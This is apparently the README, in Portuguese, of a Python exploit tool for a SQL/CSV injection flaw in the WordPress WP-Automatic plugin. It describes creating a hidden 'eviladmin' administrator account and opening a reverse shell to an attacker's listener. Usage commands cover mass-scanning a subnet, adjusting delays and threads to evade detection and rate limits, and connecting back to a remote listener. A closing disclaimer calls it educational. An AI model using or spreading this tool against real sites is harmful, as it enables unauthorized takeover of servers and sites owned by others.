Este script Python automatiza o processo de criação de uma nova conta de administrador em um site do WordPress e executando um shell reverso no servidor de destino. Ele utiliza a vulnerabilidade de injeção de CSV do WP-Automatic Plugin para executar consultas SQL no banco de dados do WordPress e obter acesso administrativo.
Digitalizando uma sub -rede : se você deseja digitalizar uma sub -rede em busca de instalações vulneráveis do WordPress, poderá usar a opção --subnet . Por exemplo:
python wp-automatic-exploit.py --subnet 192.168.1.0/24 --lhost 127.0.0.1 --lport 1414 --threads 10 --delay 1.0
Este comando examinará a sub -rede 192.168.1.0/24 para sites do WordPress com o plug -in automático vulnerável do WP e tentará explorá -los usando as configurações de ouvinte fornecidas.
Personalizando o atraso : o atraso entre as solicitações pode ser ajustado usando a opção --delay . Um atraso mais alto pode ajudar a evitar a detecção ou a limitação da taxa, enquanto um atraso mais baixo pode acelerar o processo de exploração. Por exemplo:
python wp-automatic-exploit.py --targets targets.txt --lhost 127.0.0.1 --lport 1414 --threads 10 --delay 2.5
Este comando usará um atraso de 2,5 segundos entre as solicitações.
Usando um ouvinte remoto : se o seu ouvinte estiver configurado em uma máquina remota, você poderá especificar seu endereço IP e porta usando as opções --lhost e --lport . Por exemplo:
python wp-automatic-exploit.py --targets targets.txt --lhost 192.168.1.100 --lport 8080 --threads 10 --delay 1.0
Este comando se conectará de volta a um ouvinte em 192.168.1.100:8080 .
Aumentando o número de threads : você pode aumentar o número de threads usados pelo script com a opção --threads . Isso pode acelerar o processo de exploração, mas também pode aumentar a probabilidade de detecção ou causar problemas com a limitação da taxa. Por exemplo:
python wp-automatic-exploit.py --targets targets.txt --lhost 127.0.0.1 --lport 1414 --threads 20 --delay 1.0
Este comando usará 20 threads para exploração.
requests (instale via pip install requests )domain no script pelo URL do site WordPress de destino.eviladmin , definirá a senha e atribuirá privilégios administrativos.NOTA: Verifique se você possui autorização e permissões adequadas antes de executar esse script, pois pode levar a vulnerabilidades de segurança e consequências legais se forem usadas.
Este script é fornecido apenas para fins educacionais e de teste. O autor não se responsabiliza por qualquer uso não autorizado ou ilegal deste script. Use -o por sua conta e risco.